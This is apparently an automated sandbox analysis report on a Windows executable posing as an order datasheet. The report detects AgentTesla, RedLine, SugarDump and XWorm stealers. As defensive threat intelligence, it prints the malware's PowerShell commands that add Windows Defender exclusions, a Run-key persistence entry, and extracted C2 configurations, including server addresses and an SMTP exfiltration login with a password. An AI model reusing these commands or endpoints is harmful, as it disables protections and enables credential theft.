Edit tour

Windows Analysis Report
ORDERDATASHEET#PO8738763.scr.exe

Overview

General Information

Sample name:	ORDERDATASHEET#PO8738763.scr.exe
Analysis ID:	1464617
MD5:	31cbb0ad4fbff526978c68212a36fb90
SHA1:	d5cbdd8f03037a73dd40c0819498c969ae5b9102
SHA256:	1669d57e8c83d0666c86fafcd484a5fd158c995a58ad9a6855c56d849c00b40b
Tags:	exeRedLineStealer
Infos:

Detection

AgentTesla, RedLine, SugarDump, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected RedLine Stealer

Yara detected SugarDump

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to log keystrokes (.Net Source)

Drops PE files to the user root directory

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Uses Microsoft's Enhanced Cryptographic Provider

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ORDERDATASHEET#PO8738763.scr.exe (PID: 3272 cmdline: "C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe" MD5: 31CBB0AD4FBFF526978C68212A36FB90)

conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InstallUtil.exe (PID: 5696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

RegSvcs.exe (PID: 6648 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

powershell.exe (PID: 6192 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

XClient.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

XClient.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 4944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SUGARDUMP	According to Mandiant, SUGARDUMP is a credential harvesting utility, capable of password collection from Chromium-based browsers. There are also versions to exfiltrate data via SMTP and HTTP.	No Attribution	https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping	https://malpedia.caad.fkie.fraunhofer.de/details/win.sugardump

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["195.10.205.94"], "Port": "7725", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Threatname: RedLine

{"C2 url": ["209.90.234.57:1913"], "Bot Id": "foz", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1992384164.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf2aa:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf347:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf45c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf000:$cnc4: POST / HTTP/1.1
00000003.00000002.1995905979.0000000007CF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SugarDump	Yara detected SugarDump	Joe Security
00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3565f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x356d1:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3575b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x357ed:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35857:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x358c9:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3595f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x359ef:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000003.00000002.1940827360.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.1940827360.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7bb2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7c4f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7d64:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7908:$cnc4: POST / HTTP/1.1
00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34155:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x341c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34251:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x342e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3434d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x343bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34455:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x344e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9fd1ea:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9fd287:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9fd39c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9fcf40:$cnc4: POST / HTTP/1.1
00000004.00000002.1694419298.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000002.1717816114.00000000050E7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ORDERDATASHEET#PO8738763.scr.exe PID: 3272	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegSvcs.exe PID: 6648	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegSvcs.exe PID: 6648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6648	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 6648	JoeSecurity_SugarDump	Yara detected SugarDump	Joe Security
Process Memory Space: RegSvcs.exe PID: 6648	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: powershell.exe PID: 6192	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 7292	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 7464	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 7612	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.7cf0000.4.unpack	JoeSecurity_SugarDump	Yara detected SugarDump	Joe Security
0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5fb2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x604f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6164:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5d08:$cnc4: POST / HTTP/1.1
3.2.RegSvcs.exe.7cf0000.4.raw.unpack	JoeSecurity_SugarDump	Yara detected SugarDump	Joe Security
0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7db2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7e4f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7f64:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7b08:$cnc4: POST / HTTP/1.1
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7db2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7e4f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7f64:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7b08:$cnc4: POST / HTTP/1.1
0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5fb2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x604f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6164:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5d08:$cnc4: POST / HTTP/1.1
0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7db2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7e4f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7f64:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7b08:$cnc4: POST / HTTP/1.1
3.2.RegSvcs.exe.7330000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.7330000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.73c0000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.73c0000.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.7330000.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32355:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x323c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32451:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x324e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3254d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x325bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32655:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x326e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.73c0000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3565f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x356d1:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3575b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x357ed:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35857:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x358c9:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3595f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x359ef:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.7ab0000.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.RegSvcs.exe.73c0000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.73c0000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.73c0000.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3385f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x338d1:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3395b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x339ed:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33a57:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ac9:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33b5f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33bef:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.7ab0000.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.RegSvcs.exe.7330000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.7330000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.RegSvcs.exe.7330000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.7330000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34155:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x341c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34251:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x342e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3434d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x343bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34455:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x344e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 22 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 6648, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', ProcessId: 6192, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 6648, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', ProcessId: 6192, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6648, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49745

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

